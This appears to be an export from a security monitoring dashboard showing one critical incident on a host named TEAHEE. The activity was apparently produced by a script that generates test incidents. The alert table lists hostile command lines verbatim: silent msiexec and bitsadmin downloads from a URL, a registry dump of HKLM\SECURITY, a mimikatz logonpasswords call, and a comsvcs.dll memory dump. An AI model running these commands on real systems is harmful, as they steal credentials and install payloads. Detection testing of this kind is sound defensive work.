Back to list
Critical CINC-20251221-A2E2401D new
Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:9009855904
Incident Overview
Incident ID
CINC-20251221-A2E2401D
Severity
Critical (90)
Status
new
Alert Count
15
Host Count
1
Timeline
First Seen
2025-12-21 23:52:50
Last Seen
2025-12-21 23:54:46
Duration
0d 0h 1m
Created
2025-12-22 00:41
Updated
2026-01-13 15:14
Kill Chain Analysis
Rec...
Ini...
Exe...
Per...
Pri...
Def...
Cre...
Dis...
Lat...
Col...
Com...
Exf...
Imp...
Observed Tactics:
Techniques:
Affected Hosts (1)
Related Alerts (15)
| Severity | Status | Hostname | Description | Tactic | Command Line | Time |
|---|---|---|---|---|---|---|
| High | new | TEAHEE | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-21 23:54 | |
| High | new | TEAHEE | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-21 23:54 | |
| High | new | TEAHEE | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-21 23:53 | |
| Informational | new | TEAHEE | Execution | "python" mega_incident_generator.py --rounds 2 --interval 30 | 12-21 23:53 | |
| Critical | new | TEAHEE | Credential Access | reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv | 12-21 23:53 | |
| Critical | new | TEAHEE | Credential Access | reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv | 12-21 23:53 | |
| High | new | TEAHEE | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-21 23:53 | |
| High | new | TEAHEE | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-21 23:53 | |
| High | new | TEAHEE | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-21 23:53 | |
| High | new | TEAHEE | Defense Evasion | bitsadmin /transfer j http://127.0.0.1/test C:\Users\dokji\AppData\Local\Temp\bits.exe | 12-21 23:53 | |
| High | new | TEAHEE | Credential Access | C:\WINDOWS\system32\cmd.exe /c "powershell -c "sekurlsa::logonpasswords"" | 12-21 23:53 | |
| Critical | new | TEAHEE | Credential Access | rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full | 12-21 23:53 | |
| High | new | TEAHEE | Defense Evasion | rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full | 12-21 23:53 | |
| High | new | TEAHEE | Defense Evasion | C:\WINDOWS\system32\cmd.exe /c "rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full" | 12-21 23:53 | |
| Informational | new | TEAHEE | Execution | "python" mega_incident_generator.py --rounds 2 --interval 30 | 12-21 23:52 |